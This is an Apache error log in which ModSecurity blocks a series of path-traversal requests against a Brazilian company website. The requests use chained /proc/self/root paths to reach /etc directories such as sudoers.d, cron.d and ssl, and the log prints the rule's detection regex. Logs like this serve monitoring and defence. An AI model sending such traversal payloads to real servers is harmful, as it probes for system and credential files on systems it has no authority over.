[Tue Mar 17 14:48:44.004623 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.243.128:43896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT_K4xEDsg_V3ESNZQLQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:44.862976 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:59856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT_AeiSKl8TjouI-YdFAAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:56.133843 2026] [proxy_fcgi:error] [pid 7437:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59506] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:48:57.338939 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:60322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUCRj0p0SRWAqcjGF9WwAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:58.839274 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:60324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUCsU6Sx0TG1YjmQiykgAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:00.173706 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:60328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUDKBJNF7axNlVR0Ub0AAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:01.645848 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.241.31:60338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUDb-sgTmmJoPuMdy58QAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:01.799431 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:60338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUDb-sgTmmJoPuMdy58gAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:03.358794 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.31:60342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUD6BJNF7axNlVR0Ub1QAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:04.740139 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:60358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUENY0UrI5A3LftIz_7QAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:06.220837 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.31:60374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUEq4xEDsg_V3ESNZQNQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:21.132613 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60060] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:49:22.393931 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:52348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUItY0UrI5A3LftIz_9AAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:23.843126 2026] [:error] [pid 7004:tid 140411733534464] [client 74.7.241.31:52360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUI8U6Sx0TG1YjmQiymwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:25.391341 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.31:52376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUJb-sgTmmJoPuMdy6AgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:25.894434 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:53958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUJdY0UrI5A3LftIz_-AAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:49:28.071205 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:52386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUKPPqhzTj3BvfDX-LtAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:29.733038 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.241.31:58412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUKa4xEDsg_V3ESNZQPgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:43.058644 2026] [proxy_fcgi:error] [pid 17965:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60644] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:49:44.919149 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:59718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUOBj0p0SRWAqcjGF9awAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:46.163522 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:59728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUOqBJNF7axNlVR0Ub8AAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:47.596882 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.31:59398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUO6BJNF7axNlVR0Ub9AAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:49.434629 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:59400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUPHIk7brgkOH-rIWPPAAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:49:51.492176 2026] [:error] [pid 7004:tid 140411557287680] [client 74.7.241.31:59412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmUP8U6Sx0TG1YjmQiyowAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
